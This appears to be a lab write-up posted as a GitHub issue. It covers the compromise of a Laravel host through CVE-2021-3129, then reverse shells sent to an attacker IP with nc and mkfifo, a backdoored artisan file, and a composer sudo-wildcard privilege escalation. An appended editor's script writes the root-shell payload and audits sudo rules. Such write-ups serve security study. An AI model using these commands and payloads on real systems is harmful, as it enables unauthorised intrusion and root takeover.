Open WDavid404 opened 3 months ago
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 61 OpenSSH 8.4p1 Debian 5+deb11u2 (protocol 2.0)
80/tcp open http syn-ack ttl 61 Apache httpd 2.4.56 ((Debian))
80/tcp
--> CMS powered by w3.css
/register
--> We can register a new user and login
Try to upload a file and enable Debug mode --> no change
When clicking the send button --> it goes to http://192.168.214.38/action_page.php?Name=a&Email=a&Message=a&Like=on and we can get version info: Laravel 8.4.0
Search Laravel 8.4.0 exploit info ---> https://www.exploit-db.com/exploits/49424 (Laravel 8.4.2 debug mode - Remote code execution). To use this exploit, we need to enable debug mode --> already done after registering a new user.
Based on exploit code, Access http://192.168.214.38/_ignition/execute-solution
Run exploit (Try use the default log path as parameter) --> didn't work
Search another one and try it
https://github.com/joshuavanderpoll/CVE-2021-3129
python3 CVE-2021-3129.py --host="http://192.168.183.38"
---> (Input "execute whoami")
Run again and Input "execute nc -e /bin/bash 192.168.45.182 4444" (Don't use the previous working chain!) --> got a reverse shell from the target host
linpeas: --> didn't find useful info on the mysql DB
--> didn't find a way to abuse it...
Use pspy64: -->
cp artisan artisan_bk
echo "<?php system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.45.182 80>/tmp/f'); ?>" > artisan
--> sudo -l --> (root) NOPASSWD: /usr/bin/composer --working-dir\=/var/www/html/lavita *
https://gtfobins.github.io/gtfobins/composer/
--> In the /var/www/html/lavita dir, as the www-data user, run:
echo '{"scripts":{"x":"/bin/sh -i 0<&3 1>&3 2>&3"}}' >composer.json
--> As the skunk user, run:
sudo composer --working-dir=/var/www/html/lavita run-script x
Keypoints:
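Added example (written by the editor, not part of WDavid404's issue or the GTFOBins page): a small POSIX sh script around the sudo/composer step. It flags NOPASSWD sudo rules that end in a wildcard, which is what lets an attacker append `run-script x` to the pinned `--working-dir` argument, and it writes the same composer.json payload quoted above so the script can be reused on another box. The `sudo -l` sample inside is constructed, not captured from the target; hostnames, paths and the file names are assumptions.

```shell
#!/bin/sh
# Editor's added example; not from the original issue. Sample data is constructed.

# write_composer_payload DIR
# Composer runs the value of any "scripts" entry through the shell, so when the
# sudo rule allows "composer --working-dir=DIR *", running "run-script x" as root
# executes this entry as root. Single quotes keep the redirections literal.
write_composer_payload() {
    dir="$1"
    mkdir -p "$dir"
    printf '%s\n' '{"scripts":{"x":"/bin/sh -i 0<&3 1>&3 2>&3"}}' > "$dir/composer.json"
    printf '%s\n' "$dir/composer.json"
}

# audit_sudo_l FILE
# Prints NOPASSWD rules whose command line ends in "*": a trailing wildcard lets
# the caller add arbitrary arguments, which turns a "pinned" composer invocation
# into a root shell. Rules without the wildcard are not reported.
audit_sudo_l() {
    grep -E 'NOPASSWD:.*\*[[:space:]]*$' "$1"
}

# count_wildcard_rules FILE -> number of flagged rules (for scripting/checks).
count_wildcard_rules() {
    audit_sudo_l "$1" | wc -l | tr -d ' '
}

# Constructed sample of `sudo -l` output (hostname "lavita" and the second rule
# are assumptions). Only the composer rule carries the trailing wildcard.
sample_sudo_l() {
    cat <<'EOF'
Matching Defaults entries for skunk on lavita:
    env_reset, mail_badpass

User skunk may run the following commands on lavita:
    (root) NOPASSWD: /usr/bin/composer --working-dir\=/var/www/html/lavita *
    (root) NOPASSWD: /usr/bin/systemctl restart apache2
EOF
}

# Stand-alone demo: audit the sample, then drop the payload into a scratch dir.
demo_tmp=$(mktemp -d)
sample_sudo_l > "$demo_tmp/sudo-l.txt"
echo "Wildcard NOPASSWD rules found: $(count_wildcard_rules "$demo_tmp/sudo-l.txt")"
audit_sudo_l "$demo_tmp/sudo-l.txt"
echo "Payload written to: $(write_composer_payload "$demo_tmp/lavita")"
rm -rf "$demo_tmp"
```

On a real target, `audit_sudo_l` is run against `sudo -l` output saved to a file; `write_composer_payload` must be run as the user who can write to the `--working-dir` path (www-data here), and the `sudo composer ... run-script x` call as the user named in the rule. From the defensive side the same check tells you what to fix: drop the trailing `*` and pin the full command, or remove the composer rule entirely, since `run-script` makes composer a shell wrapper whatever the working directory.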